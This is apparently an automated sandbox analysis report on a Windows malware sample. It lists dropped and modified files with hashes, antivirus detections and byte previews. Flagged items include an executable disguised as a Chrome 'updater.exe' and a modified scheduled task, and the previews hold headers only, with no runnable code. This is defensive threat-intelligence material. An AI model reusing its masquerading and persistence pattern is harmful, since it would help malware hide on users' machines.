SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmp

Download File

Process:	C:\Users\user\Desktop\h2qWqtD73F.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	138240
Entropy (8bit):	5.95337186744805
Encrypted:	false
SSDEEP:	3072:0ZCV9dKCzJJsxho1gS3a5ly4l3+NOlUho3:Xdrbsxh0gS3AlZ3+KUh
MD5:	D0743EAF2216C162B3BA2D0351F26B46
SHA1:	4D2A216F1593CE2CBF158A68873A53F04AA60B5C
SHA-256:	637CCA4CFDA8CD02AF3442C23D3495F3DA80ABAA426C71B23E3EE7EACFFBA68A
SHA-512:	291AAC1C7EDB088F5BD8BD3D5030DDFADA6A1C1FCDC00F14EA03225649CABCD04665E5EC6CA84242281F3E0C210C56B4E20DFBDF238FAD3D84216B6983B9B7C6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.......................@.....................................}....`... ..............................................`..4...............................8...........................`...(....................b..P............................text...............................`..`.data...............................@....rdata...<.......>..................@..@.pdata..............................@..@.xdata.......0......................@..@.bss.........@...........................idata..4....`......................@....CRT....`....p......................@....tls................................@....reloc..8...........................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\Desktop\h2qWqtD73F.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5980672
Entropy (8bit):	7.692419723657324
Encrypted:	false
SSDEEP:	98304:J8uD4BG85s9oxVU3MNkQ5Tmzku2D5YOttCTt9EwB6TQP+zyLlvxInBwae5MKc:Jz4UMCWQku2VvIt2q6TVyLlJIBwaf
MD5:	D0C2DD0E059C5011ED2EEE4C65122177
SHA1:	A992A12930F59A9BFF9A49337C004FEF02A9FA4E
SHA-256:	9DB1D611BBA928F40D86374641783083CDA4F613236F3EC21CE62BCDEEE9A6E6
SHA-512:	7B415D78FF03D7F700C58FBC14F98A426C968D47E8EF366BA845CFF2148D646B996B0B94438D6152EEEA801B3A8A8EC4806DE73F5D8513943E6E1519A5C624A5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....>[................@..............................[......%\...`... ..............................................p[.4.....[.x.... [.p.............[.0.............................[.(....................r[.P............................text...............................`..`.data....,Y.......Y.................@....rdata..0:....Z..<....Z.............@..@.pdata..p.... [.......[.............@..@.xdata.......@[.......[.............@..@.bss.........P[..........................idata..4....p[......&[.............@....CRT....`.....[......2[.............@....tls..........[......4[.............@....rsrc...x.....[......6[.............@....reloc..0.....[......>[.............@..B........................................................................................................................................................................

C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	4680
Entropy (8bit):	3.711527043493107
Encrypted:	false
SSDEEP:	96:pYMguQII4i6J6h4aGdinipV9ll7UY5HAmzQ+:9A4q/xne7HO+
MD5:	9449653FF4DC2FD239D572D19AC4AD97
SHA1:	7BDC3F7C3F7B5AEA76B79C70747590894597097F
SHA-256:	E8346447B05D01B5E4C8037FB482D62FB817EB2C72467A9A6D58D18DF321289D
SHA-512:	6165FD70265B74A86414F6379C341F1129D5E14B85B32A3709CC7842230B205B453DA9523D0FDD7D29E36B6459B2CC6858787F0EECDB5C7585E76EDEA42DC6E7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	3664
Entropy (8bit):	3.5415613224317393
Encrypted:	false
SSDEEP:	48:MgGyBLrP+FRGRNElW8F0OO6I4V37yLoLgm58GiNvZaCM5wYZ4Vr0Uw:rFBYYOF0OLHAoLBMNMCMjeVr0j
MD5:	AAF8F881BD8FCC0D978AAA127E1A4F6E
SHA1:	A54B490C84985CABA3750318A3F35A4B87F13840
SHA-256:	24FF7AD6BEBCE06314003111F8E553B46F93B72EE96AFB2ED18E7418A13B139D
SHA-512:	BE9DDA6B202FB3647DCFFD80836BE0EC2F6545FC2DC7F2126DB70A9D295A16AE49AA7EE5FFB019F5A15772927D4CD8AA3CC02045E38A63E74162ADE88E6832CB
Malicious:	false
Preview:	ElfChnk......................................................................................................................4............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...........&...........................................................................................................**................P............_.:&........_.:%&M_'\K.............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7....=.......K...N.a.m.e.......S.e.c.u.r.i.t.y.C.e.n.t.e.r..A..M...{........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n....

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 311, DIRTY
Category:	dropped
Size (bytes):	113360
Entropy (8bit):	3.775167257909115
Encrypted:	false
SSDEEP:	768:dJVUHiapX7xadptrDT9W84RpVUHiapX7xadptrDT9W84R:doHi6xadptrX9WPCHi6xadptrX9WP
MD5:	1873AC12882F3B05B99543DB5490D19E
SHA1:	FFC23A7DFA6ECEC3230C706FE88CC7CBECB0EE8A
SHA-256:	75305842F184656A8F40016DE2F617D9AFF74AAA53B09FFBFA8F4D58D0C3E495
SHA-512:	343FFFEE7A2EBA3BC2D558B068719E83A925EB7092F7D54027F1EFA3A112519087F739EFCF1A115C21147F2D72F83E5D9CBB9BF8CA2F7B54C24C2A7A7DFDABCF
Malicious:	false
Preview:	ElfFile.................7.....................................................................................................[.ElfChnk.........8...............8...............P....Cp........................................................................5................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r......&............m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.410855322954594
Encrypted:	false
SSDEEP:	384:XhaNFiEgN4NONMNKO6NZNC4NCuNBNkNOjCNRnNhNjNAINTNxXN3N/RNaON/BNUNY:XMiEfrvhF1T8jHj+qiQXYxd
MD5:	CB311EA91302B5598078958985827FCC
SHA1:	75C3F6845AC46F41153D137776B60A026F2ABDA7
SHA-256:	E3DDEEF5EC30C436328106077C673C5A27D9FAD11A3B01C9216B72075464E89B
SHA-512:	36537B9EA43C41155232131FBC9D3FFF86F8E290BEB66D7B6CDDC64EC860D303E01D60BC2B8F49DADFE17F1BB8164AD8907833A5B1AA265D660929803061D9C2
Malicious:	false
Preview:	ElfChnk.......................................... ..I........................................................................{.~................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................m...&...]...................................................................**..............!.U.\|...........>.&.........>.]v0].............A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	68832
Entropy (8bit):	4.278122780832949
Encrypted:	false
SSDEEP:	384:XVhVeVUV1VXVmhcV8CVhfVhxajVhjV4bV4ZwVIoVJVXVdVzVfV99VUVaV9VmVzV7:8N1ni20Hl6Mun
MD5:	25FF42E4FE9EFAF614AE7FF81247648A
SHA1:	55E8BC850DE486E4C995C89AFCCC04D9AC3649DB
SHA-256:	88A9889133C7FB6BFB85C1EA5516E8DB73FABE7F78667830D27B4F3AC80A576C
SHA-512:	23A10DA91154847AE3C44355C3BD3208022F5E53C2D148B131A4EF2A0A989A157F452C6BCAEC27ADAE5585894A322D075BB10B8BFA774425ACB8925406AF360E
Malicious:	false
Preview:	ElfChnk..................................... 8...9.............................................................................S................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................&...............................A .......................................................`\|...........>.&...............................................................@.......X..._.!.....E..........@...`\|....#..\|...@@..\|.......<........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........L...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s.A.l.a.r.m.s._.8.w.e.k.y.b.3.d.8.b.b.w.e..... .M.i..................x-.`\|...........

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67008
Entropy (8bit):	4.296716059859231
Encrypted:	false
SSDEEP:	384:hm7mk/hgmAmAam5vDmdkkmpTiMmNmMmMm2AAm7xmzmcma7mcgmxmlmZkmJmamZmW:W/BkLTiVAsPGBptZitviw26e
MD5:	A6E33032340349288404781371E89451
SHA1:	D086259FB7E6DC9AA3AA675EF4B138A7374EC151
SHA-256:	7EC8DE6D814EDD5FA50303123BF101E7FAF25EDCB3514FF51517746B3BCD1168
SHA-512:	56B54648982969F42874596287E3460AD7C68478C101F12A32AB6297D7E2F41D8FB749477E4E71A35EF8E36F0E08845B047ADF71F4B314819755C84D4882FDB9
Malicious:	false
Preview:	ElfChnk..2.......2.......2.......2.................X.........................................................................k.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................c....&...,...........................7......&...........S.......S......3...[#..s1.......................v.................2........6.............>.&...............................................................N.......d..._.!.....[..........@..6......#..\|...Z`..\|...l........2...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W..R......................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c.......a.g..........

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
Category:	dropped
Size (bytes):	70680
Entropy (8bit):	0.7955062001888485
Encrypted:	false
SSDEEP:	384:PihpiMLO1iCDil8BiOhpiMLO1iCDil8Bi:a8/8
MD5:	A29D00947E468D34C281D6CC9C455B5E
SHA1:	B45FE94E3ED362455A30F76080DE68AC06EFBE46
SHA-256:	B7C8C1154F4D865E5335CA211357499D6C2DA2A4657AE0B5CA088F1FABECF5F4
SHA-512:	9C430BB5EF48984DE4CDE741E3C835BE79E9F07C2BC38EDB2F8F9FA884BC7A2A23D6B206ED8AEEDC5BEACCECC9B1D41E45629F273B64A4CB8E91A5A0005DC719
Malicious:	false
Preview:	ElfFile.........................................................................................................................ElfChnk.....................................@.........!m......................................................................~.............................................=...........................................................................................................................f...............?...................................p...........M...F...............................................................................................................f...................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.135506377760409
Encrypted:	false
SSDEEP:	1536:ObBN2A4VD7VAx8whAGU2woJQghMKCnQNFKdI:
MD5:	BEB02D0DB227CCADB0BF2C35CD070FD8
SHA1:	093F95EF5F38C568B287E2E432C979DEE5F5F90E
SHA-256:	AB4AF4CEC5CAB588824E77B07941DFC2EBF91205ABA38A6333B068BC7A8285A6
SHA-512:	F47011A3E49890DFCED09FEAA1FB94D67BF27799EEE89B8F2ACE03D2242656BFD3D4042E0B7C0881F2AD0E7787752E5070858C0ED639C4E1FBF04D1405C02B8C
Malicious:	false
Preview:	ElfChnk.........Z...............Z...........p.................................................................................g.............................................=...................................................................................%.......................................X...............?...............................................M...F...............................................................................................................F...................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.364691867738079
Encrypted:	false
SSDEEP:	1536:IXY5nVYIyyqED5BVZUeR+oIaK+X7l/zW:IXY5nVYIyyqED5BVZUeR+oIaK+X7la
MD5:	C5FB19AD605F452A0958D4E93527B32C
SHA1:	852DD910D6716F03322D3567DC1E0CD2331ED725
SHA-256:	DC7725A06A661AB4CFDDCA37C9F7C7B60C4B62E584DA9214CD06B3C37712FEB8
SHA-512:	C72310520F98D2B97AF7B0A9E7963DE54753E515E0B8A5B4AC27B3163049BE476E5C5FFD2B2A86CAE9475C4D6EB1AAF962AEDFE884A38C64FF3E350A127EB3CF
Malicious:	false
Preview:	ElfChnk.........v...............v.....................h.....................................................................{.i.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	93416
Entropy (8bit):	2.1231712406067604
Encrypted:	false
SSDEEP:	384:EoSKmoEhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorDorfUoUor3orK:6DCxTDCxmp
MD5:	B3E3351A54BE63A4C85309B682C50E19
SHA1:	1A87D32997AEB500CEAE80A1CC079BEB52BE7963
SHA-256:	672953B196466B47A8EC2ED42FD783E16C614661E3294E7121BCC3ED8AE2E37B
SHA-512:	8E316D74917B9CF2CA5CBC54748195E1C4180BB21ECA96DFD5EDEDB52D73D3DEEFE01094904FFAF590388F7533153581AC705F5CD5F10BB92CB90F412CA8EE72
Malicious:	false
Preview:	ElfChnk.....................................(..X,...X....................................................................<&E.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................................................................'..............................*................#.............>................................................................>.......V...X.!..e................#......#..\|...WL..\|................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>..'......!>....[.U.....i...........\|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8225230073670663
Encrypted:	false
SSDEEP:	384:/hAiPA5PNPxPEPHPhPEPmPSPRP3PoP2PTnPrPdP:/2Nj
MD5:	E193E0DE6C160F3067F34D28562C3D37
SHA1:	B4896FA40B0CC4B1DF7D86AFBBD364198FCF58CE
SHA-256:	2C991430EE268B36EBF8162333381765DDA10AFE5858CCA4439BE6468F8A9885
SHA-512:	79DC790625D7BD09C34F221DEF5B9AFA59059D743EF468BAC5C9BFB5B061A790CD94F485E8547500D006FF017D0B965CCAF8491E8D4F2A964CD9502A26BFB92D
Malicious:	false
Preview:	ElfChnk......................................#...%....8........................................................................F................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8145005766277224
Encrypted:	false
SSDEEP:	384:jhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lA:jWXSYieD+tvgzmMvpmypR
MD5:	D55B088C0E91BF826E4C83D7214730FC
SHA1:	1E955E6F1F21AABCEC6159B38DBE8C6F59FD8087
SHA-256:	11BA96DD7462113CFAF207726331AE5432B83FECBB1D7FF41FC363736672E3AD
SHA-512:	C0C824271A723A331AEEBB42D3E3818C15E518A5B0A3EE293CC63EB60EF078E66EB8775CF6F14C389784F6AC8A52A1AAA51E505014E0A2C58E879CC2E7B31F3E
Malicious:	false
Preview:	ElfChnk......................................#...$..k../....................................................................3._.................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................&.......................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66536
Entropy (8bit):	3.005244253258629
Encrypted:	false
SSDEEP:	384:IahrhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqo:IobCyhLfIcP4
MD5:	BB7F115DF4D85372F7C0A8D97A68C4D8
SHA1:	D4EEAD53623CE270277F80BC1A4D2110D343438C
SHA-256:	DB573A5F7F350BB2E38ACD5ADE18F04B5F437064FF22DE75C25FFB65BDA53E93
SHA-512:	283B780E34B6B2ABBD1236A93ADFC8976F8EAC3AB530935726782078DB671452A05A397F69795E975780712618AB70250416E7322D1C666ECC5B06165F9BC664
Malicious:	false
Preview:	ElfChnk.........H...............H.....................9.......................................................................6.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...............~v......................................................................**......H.........V.............>.~v..............................................................<.......T.....!...................V......#..\|....#..\|...........H....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I.@.....NF.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I./.O.p.e.r.a.t.i.o.n.a.l....0.............`.......[.?D.Z..w.7.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.i.c.r.o.s.o.f.t.\.P.r.o.t.e.c.t.\.S.-.1.-.5.-.1.8.\..............

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.2415208663929267
Encrypted:	false
SSDEEP:	768:VcMhFBuyKskZljdoKXjtT/r18rQXn8415jCJ:2MhFBuV
MD5:	CE953E1E24F72AD450D67BA225E8CA24
SHA1:	4B21B9B1229521A48260D956D9EF82466924F0B3
SHA-256:	86C4679EACDE99AE31A1EFC0B91EE5237FED2CC4F09B39EB5CA32C15E30839F1
SHA-512:	370467BEDAE061F1B6578EF86BD9B5FDEAD08335A2D3C5B49BCEEA2F9F678A5BBE6FDA2E03AC2958CBE3F8B2C3173891E4BA2DCA76D046C888EFF8709CAE9FDF
Malicious:	false
Preview:	ElfChnk.........J...............J...........@...............................................................................p.#................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................5A..........................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.597007668718324
Encrypted:	false
SSDEEP:	768:8VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaCcOqjBz:bH
MD5:	D98BB9898E97B0AA8097C3C2AA528366
SHA1:	57B213260AA8BBABB63274AE40F474E86258AFF9
SHA-256:	563B8952C1D1C67669B0FDEE2D94FD15506AF61BAFE59D5725E51B81E8771030
SHA-512:	FA577C2EF43A7D85BBAD550CF0776D6229D9C1CBCD5A7C4BE4C0D9172ECE66DE9F04B7C0E68EB9C934C75761212C8F8A075FECD67BDC9BE08D91992144AC706C
Malicious:	false
Preview:	ElfChnk.........l...............l.............................................................................................._................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 22, DIRTY
Category:	dropped
Size (bytes):	88920
Entropy (8bit):	2.491814273419717
Encrypted:	false
SSDEEP:	384:Vbh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzw:xMAP1Qa5AgfQQqqMAP1Qa5AgfQQq
MD5:	979F4A7F39B25BD68E7225E01AC42D83
SHA1:	6393E2F60D189419609799EF2C4A5AFAEECD0A61
SHA-256:	849B2CC289A6609FF9324909A35E364F74E902BE560B1D3E574E06B51E6D2553
SHA-512:	F7CE70A0D334C73C9A1D7DB0A002E86BAA30FF8CEC9FEF916BF10E97F9BE179EC64D9F5D0081FB81F244FAFA6E51EE9136BDA4716F58EE8932C9074B0EAC9110
Malicious:	false
Preview:	ElfFile.....................................................................................................................a .iElfChnk......................................U...Z...)."....................................................................y/..................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................U.......................&..............;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.435337137002791
Encrypted:	false
SSDEEP:	384:uhbExEaE9EzE0E9EAmESE5E7EGELmEgcxEME7E3ESEmBEODUEtEUEQE7EZeIVjEp:uXHucFe09qNiHhIejgVk
MD5:	75F78963C0B36672422FBB7BFEDA205C
SHA1:	7FEF5FF9526359845B4B7CED9BB25FC2DAA48444
SHA-256:	3D99234D1704D61715BA47558DC2BB8A72399BCA72861BBF9BBBAD566EA53E3D
